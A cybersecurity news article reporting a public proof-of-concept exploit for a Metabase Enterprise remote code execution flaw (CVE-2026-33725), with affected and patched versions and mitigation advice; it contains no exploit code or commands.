PoC Exploit Released for Critical Metabase Enterprise RCE Vulnerability

A critical security vulnerability in Metabase Enterprise is drawing urgent attention after researchers released a working proof-of-concept (PoC) exploit, significantly raising the risk of active attacks.

The flaw, tracked as CVE-2026-33725, enables remote code execution (RCE) and arbitrary file access on vulnerable systems.

With a public exploit now available, organizations using the popular data analytics platform are being warned to act immediately.

Vulnerability Overview

The issue originates from a weakness in how Metabase Enterprise handles serialization imports. Specifically, the flaw is linked to an H2 JDBC INIT injection vulnerability.

In simple terms, the vulnerability allows attackers to inject malicious commands during the data import process.

When Metabase processes a specially crafted import file, it unknowingly executes attacker-controlled database instructions.

This can lead to full system compromise, including the ability to run arbitrary code or read sensitive files stored on the host machine.

Security experts compare this to inserting a forged master key into a building’s security system while it is busy onboarding new users. The system trusts the input, but the attacker gains unrestricted access.

Remote code execution vulnerabilities are considered highly severe because they allow attackers to take complete control of affected systems without authentication in some cases.

The vulnerability impacts multiple Metabase Enterprise release branches. Organizations running the following versions are at risk:

• Versions 1.47.0 through 1.54.21
• Versions 1.55.0 through 1.55.21
• Versions 1.56.0 through 1.56.21
• Versions 1.57.0 through 1.57.15
• Versions 1.58.0 through 1.58.9
• Versions 1.59.0 through 1.59.3

Any unpatched instance within these ranges is vulnerable to exploitation.

The PoC exploit was published on GitHub by security researcher Diego Tellaroli from Hakai Security.

The Python-based script automates the full attack chain required to exploit CVE-2026-33725, making it easier for attackers to replicate.

Although the repository includes an educational disclaimer, the public availability of such tools often accelerates real-world exploitation.

Threat actors can quickly adapt these scripts into automated attack campaigns targeting exposed Metabase instances.

Hakai Security, through its QuimeraX Intelligence platform, regularly discloses such vulnerabilities to promote faster remediation across organizations.

Administrators are strongly advised to patch affected systems immediately. Updated secure versions include:

• Version 1.59.4
• Version 1.58.10
• Version 1.57.16

Upgrading to these releases removes the vulnerable import behavior and blocks exploitation attempts.

If immediate patching is not feasible, organizations should restrict access to the Metabase administration interface, limit exposure to trusted networks, and closely monitor logs for suspicious import or serialization activity.

With a working exploit already circulating, delaying remediation could expose organizations to data breaches, system compromise, and potential lateral movement within enterprise environments.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google

The post PoC Exploit Released for Critical Metabase Enterprise RCE Vulnerability appeared first on Cyber Security News.